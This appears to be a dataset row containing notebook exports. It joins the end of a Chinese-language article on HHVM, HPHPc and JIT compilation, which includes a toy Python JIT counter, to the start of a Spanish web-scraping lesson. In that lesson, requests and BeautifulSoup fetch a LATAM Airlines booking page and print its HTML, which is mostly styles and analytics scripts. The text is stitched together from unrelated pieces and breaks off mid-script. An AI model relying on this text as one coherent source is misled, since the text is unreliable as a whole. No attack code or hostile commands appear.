"从上面的表现可以发现 jit 并不是那么的美好,因为 jit 这个过程也是存在性能损耗的,所以这种简单的方法反而会比普通的解释器慢\n\n<img src='./images/hphpc_vs_hhvm.png' alt='hphpc_vs_hhvm' width=\"600\" />\n\n安卓的目前的运行时方案 ART (Andriod Run Time)作为 Android 上的应用和部分系统服务使用的托管式运行时,采用的就是 HPHPc 的 AOT 方案,其前身 Dalvik 使用的 JIT 方案,但是 ART 虚拟机比 Dalvik 快了一倍多。\n\n为了保证虚拟机 jit 的性能优化,Facebook 招聘了各路神仙\n\n- Andrei Alexandrescu,『Modern C++ Design』和『C++ Coding Standards』的作者,C++ 领域无可争议的大神\n- Keith Adams,负责过 VMware 核心架构,当年 VMware 就派他一人去和 Intel 进行技术合作,足以证明在 VMM 领域他有多了解了\n- Drew Paroski,在微软参与过 .NET 虚拟机开发,改进了其中的 JIT\n- Jason Evans,开发了 jemalloc,减少了 Firefox 一半的内存消耗\n- Sara Golemon,『Extending and Embedding PHP』的作者,PHP 内核专家\n\n### Interpreter\n\nHHVM 在 parse 完 PHP 源码会生成一种 Bytecode (opcode),储存在 .hhvm.hhbc 文件中索引,在执行 Bytecode 时和 Zend 类似,将不同的字节码放到不同的函数中去实现 (Subroutine threading)。具体的生成逻辑在 `hphp/runtime/vm/hhbc.cpp`\n\n因为重新实现了解释器,HHVM 比起 HPHPc 能够提供更加优异的兼容性,理论上可以做到对 PHP 所有特性的完美兼容,但是这样的性能还是走了 Zend 的老路子,并且对于动态类型,需要实现类似于如下的判断\n\n```cpp\nVMType::Variant VMExecutionContext::add(const VMType::Variant &left, const VMType::Variant &right) {\n if (this->GST[left.uid] == VMType::Int64 && this->GST[right.uid] == VMType::Int64) {\n return this->IntAddImpl->exec(left, right);\n }\n // TODO: some other impl\n}\n```\n\n而我们知道这样的 if else 条件判断对 CPU 的执行优化是严重的拖累,另一个问题是需要从数据都是储存在对象中,作为 boxed structure 每次的间接获取地址也是有成本的,所以需要 jit 的实现来完成这些工作\n\n### JIT Impl\n\n其实本质上 jit 和 `eval()` 是类似的,只不过 jit eval 的不是源码字符串,而是不同平台下的机器码。HHVM 实现了一个 x64 的机器码生成器(HHBBC)。\n\n常见的 jit 触发条件有两种\n\n- trace:记录循环执行次数,如果超过一定数量就对这段代码进行 jit\n- method:记录函数执行次数,如果超过一定数量就对这个函数内的代码片段进行 jit,如果过于 hot 就直接改为 inline\n\n关于这两种方法哪种更好在 [Lambada](http://lambda-the-ultimate.org/node/3851) 上有个帖子引来了各路大神的讨论,尤其是 Mike Pall(LuaJIT 作者) 、Andreas Gal(Mozilla VP) 和 Brendan Eich(Mozilla CTO)都发表了很多自己的观点,两者的区别不仅仅是编译的范围,还有包括局部变量处理在内的很多细节方面都不太一样。\n\n然而 HHVM 自创了一种叫做 tracelet 的方式,根据类型划分\n\n<img src='./images/hhvm_tracelet.png' alt='hhvm_tracelet' width=\"1000\" />\n\ntracelet 将一个函数划分了 3 个部分,A,C用于处理入参 `$k` 是 integer 或者 string 两种类型的情况,B 用于处理返回值,因此 HHVM 的 jit 触发更像是与类型相关,具体如何分析和拆解 tracelet 的细节在 `hphp/runtime/vm/jit` 中,太深了就不需要了解了。\n\n当然 HHVM 的 jit 优化还体现在很多地方,比如 如果 C 比 A 更加 hot(命中次数更多),HHVM 就会在 jit 的过程中倾向于把 C 放在 A 的前面,据说这样的操作提升了 14% 的性能,因为这样更容易提前命中需要相应的类型。\n\n### Hack\n\nhhvm/jit 的关键是类型,而猜测类型就像上面的例子一样是一个对 CPU 非常不友好的操作,所以 HHVM 的开发者就开始考虑为 PHP 添加类型支持,推出了一个新的语言 - Hack,通过静态类型指定让 HHVM 能够更好的提供性能优化。同时也能够让代码可读性大大提升,方便 IDE 提供更多帮助,在编码阶段减少很多没有必要的 bug。",
"_____no_output_____"
],
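[
"A toy sketch of the method-counter trigger described above, in Python: the interpreter counts how often a function runs and switches to a compiled version once it gets hot. This is only a conceptual model; the threshold, the `ToyJIT` class and the stand-in compile step are invented for illustration and have nothing to do with HHVM's real tracelet machinery.\n\n```python\nHOT_THRESHOLD = 3  # assumed value; real JITs tune this carefully\n\nclass ToyJIT:\n    def __init__(self):\n        self.call_counts = {}   # function name -> number of interpreted calls\n        self.compiled = {}      # function name -> 'machine code' stand-in\n\n    def run(self, name, interpreted_fn, compile_fn, *args):\n        # Fast path: already compiled, jump straight to the compiled version.\n        if name in self.compiled:\n            return self.compiled[name](*args)\n        # Slow path: interpret this call and bump the hotness counter.\n        self.call_counts[name] = self.call_counts.get(name, 0) + 1\n        if self.call_counts[name] >= HOT_THRESHOLD:\n            self.compiled[name] = compile_fn()  # 'compile' once it is hot enough\n        return interpreted_fn(*args)\n\n\njit = ToyJIT()\ninterp_add = lambda a, b: a + b              # stands in for bytecode interpretation\ncompile_add = lambda: (lambda a, b: a + b)   # stands in for emitting machine code\nfor _ in range(5):\n    jit.run('add', interp_add, compile_add, 1, 2)\nprint(sorted(jit.compiled))  # ['add'] once the function became hot\n```",
"_____no_output_____"
],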
[
"## Conclusion\n\nHPHPc / HHVM 作为两种为动态的脚本语言提供性能优化的方案都是有可取之处的,HPHPc 能够在静态编译的过程中完成各种可能的性能优化,比起 HHVM 的优化, HPHPc 的优化能够更加稳定,AOT 是一种非常成熟的优化方案\n\nHHVM 则能够更加完美的兼容动态语言的特性,jit 是一种近年来发展迅速的技术,迭代更新快,能够一直保持对性能的优化。",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb030d38be823f327a61d9f74e956baa74f8eaca | 66,929 | ipynb | Jupyter Notebook | NoteBooks/Curso de WebScraping/Unificado/web-scraping-master/Clases/Módulo 3_ Scraping con Selenium/M3C8. Demoras dinámicas.ipynb | Alejandro-sin/Learning_Notebooks | 161d6bed4c7b1d171b45f61c0cc6fa91e9894aad | [
"MIT"
] | 1 | 2021-02-26T13:12:22.000Z | 2021-02-26T13:12:22.000Z | NoteBooks/Curso de WebScraping/Unificado/web-scraping-master/Clases/Módulo 3_ Scraping con Selenium/M3C8. Demoras dinámicas.ipynb | Alejandro-sin/Learning_Notebooks | 161d6bed4c7b1d171b45f61c0cc6fa91e9894aad | [
"MIT"
] | null | null | null | NoteBooks/Curso de WebScraping/Unificado/web-scraping-master/Clases/Módulo 3_ Scraping con Selenium/M3C8. Demoras dinámicas.ipynb | Alejandro-sin/Learning_Notebooks | 161d6bed4c7b1d171b45f61c0cc6fa91e9894aad | [
"MIT"
] | null | null | null | 50.588813 | 12,551 | 0.597828 | [
[
[
"# Módulo 2: Scraping con Selenium\n## LATAM Airlines\n<a href=\"https://www.latam.com/es_ar/\"><img src=\"https://i.pinimg.com/originals/dd/52/74/dd5274702d1382d696caeb6e0f6980c5.png\" width=\"420\"></img></a>\n<br>\n\nVamos a scrapear el sitio de Latam para averiguar datos de vuelos en funcion el origen y destino, fecha y cabina. La información que esperamos obtener de cada vuelo es:\n- Precio(s) disponibles\n- Horas de salida y llegada (duración)\n- Información de las escalas\n\n**¡Empecemos!**\nUtilicemos lo aprendido hasta ahora para lograr el objetivo propuesto",
"_____no_output_____"
]
],
[
[
"import requests\nfrom bs4 import BeautifulSoup",
"_____no_output_____"
],
[
"url = 'https://www.latam.com/es_ar/apps/personas/booking?fecha1_dia=18&fecha1_anomes=2019-12&auAvailability=1&ida_vuelta=ida&vuelos_origen=Buenos%20Aires&from_city1=BUE&vuelos_destino=Madrid&to_city1=MAD&flex=1&vuelos_fecha_salida_ddmmaaaa=18/12/2019&cabina=Y&nadults=1&nchildren=0&ninfants=0&cod_promo=#/'",
"_____no_output_____"
],
[
"r = requests.get(url)",
"_____no_output_____"
],
[
"r.status_code",
"_____no_output_____"
],
[
"s = BeautifulSoup(r.text, 'lxml')",
"_____no_output_____"
],
[
"print(s.prettify())",
"<!DOCTYPE html>\n<html lang=\"es\">\n <head>\n <meta content=\"text/html; charset=utf-8\" http-equiv=\"Content-Type\"/>\n <meta content=\"IE=edge,chrome=1\" http-equiv=\"X-UA-Compatible\"/>\n <title>\n Selecciona tus vuelos | LATAM Airlines\n </title>\n <meta content=\"width=device-width, initial-scale=1.0\" name=\"viewport\"/>\n <link href=\"https://s.latamstatic.com/static/latam/images/favicon/LATAM/favicon.ico\" rel=\"shortcut icon\" type=\"image/x-icon\"/>\n <meta content=\"personas_bs3_latam_mu\" name=\"layout\"/>\n <meta content=\"LAN.com\" name=\"description\"/>\n <meta content=\"LAN.com\" name=\"keywords\"/>\n <meta content=\"B90D7B166BC8D2088504237E75BD91D8\" name=\"sessionId\" scheme=\"tracker\"/>\n <meta content=\"latam\" name=\"matchedScenario\" scheme=\"tracker\"/>\n <meta content=\"personas_bs3_latam_mu\" name=\"template\" scheme=\"tracker\"/>\n <meta content=\"null\" name=\"userDataCookieRawData\" scheme=\"tracker\"/>\n <meta content=\"3.0.53\" name=\"appVersion\" scheme=\"tracker\"/>\n <style>\n .async-hide{opacity:0!important}\n </style>\n <script>\n (function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;h.start=1*new Date;h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')};(a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);h.timeout=c;})(window,document.documentElement,'async-hide','dataLayer',4000,{'GTM-K6HPBWM':true});\n </script>\n <script>\n (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');ga('create','UA-111120716-2','auto',{allowLinker:true});ga('require','GTM-K6HPBWM');\n </script>\n <script type=\"text/javascript\">\n (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-MJ285C5');\n </script>\n <script src=\"https://s.latamstatic.com/js/libs/external/modernizr/2.6.2/modernizr.custom.js\" type=\"text/javascript\">\n </script>\n <!--[if lt IE 9]>\n\t <script src=\"/js/libs/external/compatibility/shiv/3.7.0/html5shiv.js\"></script>\n <![endif]-->\n <!--[if lt IE 9]>\n\t <script src=\"/js/libs/external/respond/1.4.2/respond.min.js\"></script>\n<![endif]-->\n </head>\n <body onload=\"removeBodyPadding();\">\n <div class=\"hyf-modal-black\">\n </div>\n <div class=\"hyf-mu-wrapper\">\n <noscript>\n <iframe height=\"0\" src=\"//www.googletagmanager.com/ns.html?id=GTM-MJ285C5\" style=\"display: none; visibility: hidden\" width=\"0\">\n </iframe>\n </noscript>\n <style id=\"styleHeaderLatam\">\n html{margin:0;padding:0;min-height:100%;position:relative}body{margin:0;padding:0}a>[class^=\"icon-\"],a>[class*=\"icon-\"]{margin:5px 22px 0 0}.hyf-modal-black{display:none;opacity:1;background-color:rgba(0,0,0,.8);position:fixed;top:0;left:0;right:0;bottom:0;margin:0;z-index:99999999998;-webkit-transition:all 1s;-moz-transition:all 1s;transition:all 
1s}.hyf-not-underline{text-decoration:none}.hyf-icon-clear{float:none;margin:0}.hyf-mobile-view{height:100%;overflow:hidden}.hyf_mu_wrapper,.hyf_mu_header,.hyf-mu-content,.hyf-mu-footer{padding:0;margin:0}.hyf_mu_wrapper{min-height:100%;position:relative}.hyf-mu-header{position:relative}@media (min-width:768px){.hyf-mu-header{position:fixed;top:0;width:100%;z-index:100}#appMain{margin-top:36px}}.hyf-mu-header-container{height:36px;background-color:#1b0088;position:relative;font-family:'Latam-Sans-Regular'}.hyf-mu-content{}.hyf-mu-footer{background:#1b0088;width:100%;position:absolute;bottom:0;left:0}.hyf-goleft{position:relative;float:left}.hyf-alleft{text-align:left}.hyf-goright{position:relative;float:right}.hyf-alright{text-align:right}.hyf-container{max-width:960px;margin:0 auto;position:relative}.hyf-goup{text-transform:uppercase}.hyf-col-25{width:25%;float:left}.hyf-col-100{width:100%;float:left}.hyf-header-section{height:36px;font-size:1em}.hyf-header-section .hyf-header-element{vertical-align:middle;padding:8px 0;text-decoration:none;color:#b8b8b8;margin:0 5px;border:none;top:6px;position:relative}.hyf-contry-ul li a:focus{outline:#1b0088 auto 2px}.hyf-header-section .hyf-header-element span{padding-top:5px;margin:0;color:#fff}.hyf-header-section .hyf-header-element.hyf-goup.hyf-pais-show:hover{background-color:#f3f3f3;color:#1b0088}.hyf-header-section .hyf-header-element.hyf-goup.hyf-pais-hide{background-color:#f3f3f3;background-color:rgba(243,243,243,97);color:#1b0088}.hyf-header-section .hyf-header-element.hyf-goup.hyf-pais-hide:focus{border:none}.hyf-header-section .hyf-header-element.hyf-login{display:none;text-align:left;text-decoration:none;font-size:14px;font-family:'Latam-Sans-Regular',arial,sans-serif;border:0;color:#fff;padding:0 0 0 40px}.hyf-header-section .hyf-header-element.hyf-login span{color:#fff;text-decoration:none}.hyf-header-section .hyf-header-element.hyf-login span:hover{text-decoration:none}.hyf-header-section .hyf-header-element a.hyf-login:hover{background-color:#ed1650;text-decoration:none}.hyf-login-info{position:absolute;margin-left:-40px;background-color:#fff;padding:10px 25px 20px 25px;border-bottom-left-radius:5px;width:100%;border-bottom-right-radius:5px;border-top-left-radius:0;border-top-right-radius:0;border:1px solid #bfbfbf;color:#666;z-index:2;display:none}.hyf-login-info a{display:block;margin:6px 0;color:#666;text-decoration:none;font-family:'Latam-Sans-Bold'}.hyf-login-info a:hover{text-decoration:underline}.hyf-login-info a:last-child{text-align:right;margin-top:15px;margin-bottom:0;border-top:2px solid #b30f3b;padding-top:10px}.hyf-login-link{color:#fff;text-decoration:none}.hyf-login-text{max-width:223px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}#hyf-icon-log-icon,#hyf-icon-log-iconi{margin:-5px -28px -13px -45px;color:#fff}#hyf-icon-log-caret{float:right;margin:10px 5px;color:#fff}.hyf-country-selector{position:absolute;overflow:hidden;border:1px solid #f3f3f3;border-radius:0 0 1px 1px;padding:10px 15px;color:#666;text-align:left;z-index:99999999999;max-width:930px;box-sizing:border-box;-webkit-box-shadow:0 1px 1.68px 1.32px rgba(0,2,0,.5);-moz-box-shadow:0 1px 1.68px 1.32px rgba(0,2,0,.5);box-shadow:0 1px 1.68px 1.32px rgba(0,2,0,.5)}.hyf-country-selector ul{list-style:none;margin:0;padding:0}.hyf-country-selector ul li{list-style:none;margin:0 0 10px 0;padding:0;font-size:1em}.hyf-country-selector 
.hyf-country-selector-title{font-size:1em;font-family:'Latam-Sans-Bold';margin-top:10px;margin-bottom:11px}.hyf-logo{padding:0;height:70px;line-height:80px;margin-top:20px;margin-bottom:20px;position:relative}.hyf-logo a{position:relative;margin-right:42px}.hyf-header-section .hyf-header-element.Header-actionLinkBurger{padding:0;width:24px;height:24px;background:url(https://www.latam.com/static/latam/images/content-image/header/icn-burger.svg) no-repeat center center}.hyf-header-section .hyf-header-element.Header-userLink{padding:0;width:24px;height:24px;float:none;top:0;right:20px}.hyf-only-focusable{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0,0,0,0);border:0}.hyf-only-focusable:focus{position:relative;width:auto;height:auto;overflow:hidden;clip:auto;display:inline-block;background-color:#fff;color:#1b0088;margin:5px;outline:2px solid #1b0088;outline-offset:0}.text-skip-to-main-content{margin:0}.hyf-header-section .hyf-header-element:focus{outline:2px solid #b8b8b8;outline-offset:0}.hyf-logo a:focus{outline:2px solid #1b0088}.hyf-logoLink{position:absolute;top:5px;left:5px}.hyf-logoLink:focus{outline:2px solid #b8b8b8;outline-offset:0}.hyf-logoOneWorldLink{position:absolute;top:5px;left:100px}.hyf-logoOneWorldLink:focus{outline:2px solid #b8b8b8;outline-offset:0}#mobileHeader{background-color:#1b0088;border-bottom-color:#b8b8b8;font-family:'Latam-Sans-Regular';color:#fff;font-size:14px;height:50px;padding-top:10px;position:relative}#mobileTitle{font-size:25px;font-weight:700;margin:0;text-align:center;color:#fff}.hyf-returnLink{float:left}#hyf-returnLink:focus{outline:2px solid #b8b8b8;outline-offset:0}.hyf-cs-div{background-color:#fff;position:absolute;height:80px;top:0;left:0;width:100%;padding:10px;overflow:hidden}.hyf-cs-div a{width:100%;display:block;margin:10px 5px;text-decoration:none;color:#666}.hyf-cs-margin{position:relative;height:60px}#hideMenu,#hyf-country-selector{display:none}a.hyf-login-link{outline:none;text-decoration:none}.lt-icon-flag{background-image:url(https://www.latam.com/static/latam/images/design-image/sprites/icon-sprite.png);float:left;margin:5px 22px 0 0}.lt-icon-ar-small{background-position:-85px -120px;width:17px;height:11px}.lt-icon-ar{background-position:0 -100px;width:30px;height:20px}.lt-icon-au-small{background-position:-51px -120px;width:17px;height:11px}.lt-icon-au{background-position:-30px -20px;width:30px;height:20px}.lt-icon-br-small{background-position:-17px -120px;width:17px;height:11px}.lt-icon-br{background-position:-30px -40px;width:30px;height:20px}.lt-icon-ca-small{background-position:-120px -99px;width:17px;height:11px}.lt-icon-ca{background-position:-60px -20px;width:30px;height:20px}.lt-icon-cl-small{background-position:-120px -77px;width:17px;height:11px}.lt-icon-cl{background-position:0 -60px;width:30px;height:20px}.lt-icon-co-small{background-position:-30px -100px;width:17px;height:11px}.lt-icon-co{background-position:-60px -60px;width:30px;height:20px}.lt-icon-de-small{background-position:-120px -33px;width:17px;height:11px}.lt-icon-de{background-position:-90px -20px;width:30px;height:20px}.lt-icon-ec-small{background-position:-120px -11px;width:17px;height:11px}.lt-icon-ec{background-position:-90px -60px;width:30px;height:20px}.lt-icon-es-small{background-position:-98px -100px;width:17px;height:11px}.lt-icon-es{background-position:-30px -80px;width:30px;height:20px}.lt-icon-eu-small{background-position:-64px -100px;width:17px;height:11px}.lt-icon-eu{background-position:-90px 
-80px;width:30px;height:20px}.lt-icon-fr-small{background-position:-47px -100px;width:17px;height:11px}.lt-icon-fr{background-position:0 0;width:30px;height:20px}.lt-icon-it-small{background-position:-120px -55px;width:17px;height:11px}.lt-icon-it{background-position:-60px -80px;width:30px;height:20px}.lt-icon-mx-small{background-position:-81px -100px;width:17px;height:11px}.lt-icon-mx{background-position:0 -80px;width:30px;height:20px}.lt-icon-nz-small{background-position:-120px 0;width:17px;height:11px}.lt-icon-nz{background-position:-90px -40px;width:30px;height:20px}.lt-icon-otros_paises-small{background-position:-120px -22px;width:17px;height:11px}.lt-icon-otros_paises{background-position:-90px 0;width:30px;height:20px}.lt-icon-pe-small{background-position:-120px -44px;width:17px;height:11px}.lt-icon-pe{background-position:-30px -60px;width:30px;height:20px}.lt-icon-pr-small{background-position:-120px -66px;width:17px;height:11px}.lt-icon-pr{background-position:-60px -40px;width:30px;height:20px}.lt-icon-sa-small{background-position:-120px -88px;width:17px;height:11px}.lt-icon-sa{background-position:-60px 0;width:30px;height:20px}.lt-icon-ue-small{background-position:0 -120px;width:17px;height:11px}.lt-icon-ue{background-position:0 -40px;width:30px;height:20px}.lt-icon-uk-small{background-position:-34px -120px;width:17px;height:11px}.lt-icon-uk{background-position:0 -20px;width:30px;height:20px}.lt-icon-uy-small{background-position:-68px -120px;width:17px;height:11px}.lt-icon-uy{background-position:-30px 0;width:30px;height:20px}@media only screen and (max-width:319px){.hyf-visible-xs{display:inline}.hyf-hidden-xs{display:none}.hyf-visibleb-xs{display:block}.hyf-visibleib-xs{display:inline-block}.hyf-col-25{width:100%}.hyf-flag-centrado{display:block;padding-top:6px}.hyf-mu-content{padding-bottom:135px}.hyf-mu-footer{height:135px}.hyf-contry-ul li a{display:inline}.hyf-country-selector{margin-top:-36px;width:85%;right:0;background-color:#e5e5e5}#hyf-icon-log-caret{display:none}#hyf-icon-log-iconi{display:block}#hyf-icon-log-icon.isLoggedIn{color:#b30f3b}.hyf-header-section .hyf-header-element.hyf-login{background-color:transparent}}@media only screen and (min-width:320px){.hyf-visible-xs{display:inline}.hyf-hidden-xs{display:none}.hyf-visibleb-xs{display:block}.hyf-visibleib-xs{display:inline-block}.hyf-col-25{width:100%}.hyf-flag-centrado{display:block;padding-top:6px}.hyf-mu-content{padding-bottom:135px}.hyf-mu-footer{height:135px}.hyf-contry-ul li a{display:inline}.hyf-country-selector{margin-top:-36px;width:85%;right:0;background-color:#e5e5e5}#hyf-icon-log-caret{display:none}#hyf-icon-log-iconi{display:block}#hyf-icon-log-icon.isLoggedIn{color:#b30f3b}.hyf-header-section .hyf-header-element.hyf-login{background-color:transparent}}@media only screen and (min-width:480px){.hyf-visible-xs{display:inline}.hyf-hidden-xs{display:none}.hyf-visibleb-xs{display:block}.hyf-visibleib-xs{display:inline-block}.hyf-col-25{width:100%}.hyf-flag-centrado{display:block;padding-top:6px}.hyf-mu-content{padding-bottom:135px}.hyf-mu-footer{height:135px}.hyf-contry-ul li a{display:inline}.hyf-country-selector{margin-top:-36px;width:85%;right:0;background-color:#e5e5e5}#hyf-icon-log-caret{display:none}#hyf-icon-log-iconi{display:block}#hyf-icon-log-icon.isLoggedIn{color:#b30f3b}.hyf-header-section .hyf-header-element.hyf-login{background-color:transparent}}@media only screen and 
(min-width:768px){.hyf-visible-sm{display:inline}.hyf-hidden-sm{display:none}.hyf-visibleb-sm{display:block}.hyf-col-25{width:25%}.hyf-flag-centrado{display:inline;padding:0}.hyf-mu-content{padding-bottom:76px}.hyf-mu-footer{height:76px}.hyf-contry-ul li a{display:inline-block}#hyf-icon-log-caret{display:inline-table}#hyf-icon-log-icon.isLoggedIn{color:#fff}#hyf-icon-log-iconi{display:none}.hyf-country-selector{margin-top:0;width:100%;background-color:#f3f3f3;background-color:rgba(243,243,243,97)}.hyf-header-section .hyf-header-element.hyf-login{background-color:#b30f3b}}@media only screen and (min-width:992px){.hyf-visible-md{display:inline}.hyf-hidden-md{display:none}.hyf-visibleb-md{display:block}.hyf-col-25{width:25%}.hyf-flag-centrado{display:inline;padding:0}.hyf-mu-content{padding-bottom:76px}.hyf-mu-footer{height:76px}.hyf-contry-ul li a{display:inline-block}#hyf-icon-log-caret{display:inline-table}#hyf-icon-log-icon.isLoggedIn{color:#fff}.hyf-country-selector{margin-top:0;width:100%;background-color:#f3f3f3;background-color:rgba(243,243,243,97)}#hyf-icon-log-iconi{display:none}.hyf-header-section .hyf-header-element.hyf-login{background-color:#b30f3b}}@media only screen and (min-width:1200px){.hyf-visible-lg{display:inline}.hyf-hidden-lg{display:none}.hyf-visibleb-md{display:block}.hyf-col-25{width:25%}.hyf-flag-centrado{display:inline;padding:0}.hyf-mu-content{padding-bottom:76px}.hyf-mu-footer{height:76px}.hyf-contry-ul li a{display:inline-block}#hyf-icon-log-caret{display:inline-table}#hyf-icon-log-icon.isLoggedIn{color:#fff}#hyf-icon-log-iconi{display:none}.hyf-country-selector{margin-top:0;width:100%;background-color:#f3f3f3;background-color:rgba(243,243,243,97)}.hyf-header-section .hyf-header-element.hyf-login{background-color:#b30f3b}}\n </style>\n <div class=\"hyf-mu-header\" id=\"hyfLatam\" role=\"banner\" style=\"display:none\">\n <div class=\"hyf-container\" role=\"application\">\n <a class=\"hyf-only-focusable\" href=\"#appMain\" onkeydown=\"skipToMainContent(event);\" title=\"Ir al contenido principal\">\n <span class=\"text-skip-to-main-content\">\n Ir al contenido principal\n </span>\n </a>\n </div>\n <nav class=\"hyf-mu-header-container\" role=\"navigation\">\n <section class=\"hyf-container hyf-header-section\">\n <div class=\"hyf-goleft\">\n <a class=\"hyf-header-element hyf-hidden-xs hyf-visible-sm hyf-visible-md hyf-visible-lg\" href=\"https://www.latam.com\">\n <img alt=\"LATAM Logo\" class=\"Header-logoImg\" height=\"25px\" src=\"https://s.latamstatic.com/static/latam/images/content-image/header/latam-logo-sticky.svg\" width=\"110px\"/>\n </a>\n <a class=\"hyf-header-element hyf-visible-xs hyf-hidden-sm hyf-hidden-md hyf-hidden-lg\" href=\"https://www.latam.com\">\n <img alt=\"LATAM Logo\" height=\"28px\" src=\"https://s.latamstatic.com/static/latam/images/content-image/header/latam-logo-sticky.svg\"/>\n </a>\n </div>\n <div class=\"hyf-goright\">\n <a class=\"hyf-header-element hyf-hidden-xs hyf-visible-sm hyf-visible-md hyf-visible-lg\" href=\"https://helpdesk.latam.com/hc/es/\" target=\"_self\">\n Centro de ayuda\n </a>\n <a class=\"hyf-header-element hyf-visible-xs hyf-hidden-sm hyf-hidden-md hyf-hidden-lg\" href=\"https://helpdesk.latam.com/hc/es/\" target=\"_self\">\n <span class=\"icon-bold-int015 icon-medium\">\n </span>\n </a>\n </div>\n </section>\n </nav>\n </div>\n <script type=\"text/javascript\">\n (function(){function 
header(){this.homesMultiplus=[];this.appsMultiplus=[];};header.prototype={cleanSelector:function(selector){selector.forEach(function(select){document.querySelector(select).removeAttribute(\"style\");});},removeStyles:function(selectors){selectors.forEach(function(select){document.querySelector(select).remove();});},applyHeaderRules:function(){var urlData,app,home;urlData=document.location.pathname;urlData=urlData.split(\"/\");app=urlData[4];home=urlData[1];this.cleanSelector([\"#hyfLatam\"]);}};var header=new header();header.applyHeaderRules();})();\n </script>\n <div class=\"hyf-mu-content\" id=\"appMain\" role=\"main\" tabindex=\"-1\">\n <div class=\"container\">\n <noscript>\n <div>\n Para una mejor experiencia en LAN.com, habilite JavaScript\n en su navegador\n </div>\n </noscript>\n <div id=\"mainContent\">\n </div>\n <script type=\"text/javascript\">\n (function(global){global.LAN=global.LAN?global.LAN:{};})(this);LAN.Environment={env:'production',jsLibBaseUrl:'/js/libs/',cssBaseUrl:'/',lastDirectRequest:'2019-11-05T23:36:50+0000',dictionary:true,debug:false,home:'es_ar',site:'lan',country:'AR',language:'ES',portal:'personas',application:'booking',step:'',appDist:'dist',jsAppBaseUrl:'/apps/booking/1.5.10/',appMainContent:'mainContent'};LAN.Configuration={'baseUrlBff':'https://bff.latam.com/','baseUrlLan':'https://www.lan.com/','baseUrlLegacy':'https://booking.lan.com/','baseUrlLegacySSL':'https://ssl.lan.com/','urlHome':'https://www.latam.com/','enabledDomains':'.*','defaultProtocol':'http','theme':''};\n </script>\n <script src=\"https://s.latamstatic.com/js/libs/external/require/2.1.8/require.js\" type=\"text/javascript\">\n </script>\n <script src=\"https://s.latamstatic.com/js/libs/lan/utils/requireConfig/2.1/requireConfig.min.js\" type=\"text/javascript\">\n </script>\n <script src=\"https://s.latamstatic.com/apps/booking/1.5.10/dist/js/booking.config.js\" type=\"text/javascript\">\n </script>\n <script async=\"\" src=\"https://s.latamstatic.com/apps/booking/1.5.10/dist/js/booking.js\" type=\"text/javascript\">\n </script>\n </div>\n </div>\n <div class=\"hyf-mu-footer\">\n <style id=\"styleFooterLatam\">\n .hyf-footer-latam{border-top:3px solid #ed1650;background-color:#1b0088;overflow:hidden}.hyf-footer-latam-container{padding:24px 0;display:block;text-align:center}.hyf-footer-latam-container p{font-size:1.0em;line-height:120%;vertical-align:middle;color:#bfbfbf;margin:0}.hyf-footer-latam-copyright{overflow:hidden;text-align:center}.hyf-footer-latam-logo{display:block;text-align:center}.hyf-footer-latam-logo a:focus{outline:2px solid #b8b8b8;outline-offset:-2px}.hyf-footer-latam-16{height:16px;display:block}.hyf-col-f25{width:100%}.hyf-col-f75{width:100%}@media (min-width:768px){.hyf-footer-latam-logo{text-align:right}.hyf-footer-latam-copyright{text-align:left}.hyf-footer-latam-container p{float:left}.hyf-footer-latam-container{padding:20px 0}.hyf-col-f25{width:auto}.hyf-col-f75{width:auto}.hyf-footer-latam-16{height:0}}@media only screen and (min-width:992px){.hyf-footer-latam-16{height:0}}@media only screen and (min-width:1200px){.hyf-footer-latam-16{height:7px}}\n </style>\n <footer class=\"hyf-footer-latam\" id=\"appFooterLatam\" role=\"contentinfo\" style=\"display:none\">\n <div class=\"hyf-container hyf-footer-latam-container\">\n <div class=\"footer-latam-copyright hyf-goleft hyf-col-f75\">\n <div class=\"hyf-hidden-sm hyf-hidden-md hyf-visible-xs hyf-visible-lg hyf-footer-latam-16\">\n <br/>\n </div>\n <p>\n © 2019 LATAM Airlines Argentina\n </p>\n <p 
class=\"hyf-hidden-sm hyf-hidden-md hyf-hidden-lg hyf-visible-xs\">\n Todos los derechos reservados.\n </p>\n <div class=\"hyf-hidden-lg hyf-hidden-xs hyf-visible-sm hyf-visible-md\">\n <br/>\n </div>\n <p class=\"hyf-hidden-xs hyf-visible-sm hyf-visible-md hyf-visible-lg\">\n </p>\n </div>\n <div class=\"hyf-footer-latam-logo hyf-goright hyf-col-f25\">\n <a href=\"#\" target=\"target\" title=\"titulo\">\n <img alt=\"alt\" height=\"36px\" src=\"https://s.latamstatic.com/css/img/logos/LATAM_Logo_Footer.svg\"/>\n </a>\n </div>\n </div>\n </footer>\n <script async=\"\" src=\"https://s.latamstatic.com/js/libs/lan/commons/commonsFunc/1.0.0/headerFuncs.min.js\" type=\"text/javascript\">\n </script>\n <script async=\"\" src=\"https://s.latamstatic.com/js/libs/lan/commons/commonsFunc/1.0.0/accessibilityFuncs.min.js\" type=\"text/javascript\">\n </script>\n <script type=\"text/javascript\">\n (function(){function footer(){this.homesMultiplus=[];this.appsMultiplus=[];};footer.prototype={cleanSelector:function(selector){selector.forEach(function(select){document.querySelector(select).removeAttribute(\"style\");});},removeStyles:function(selectors){selectors.forEach(function(select){document.querySelector(select).remove();});},applyFooterRules:function(){var 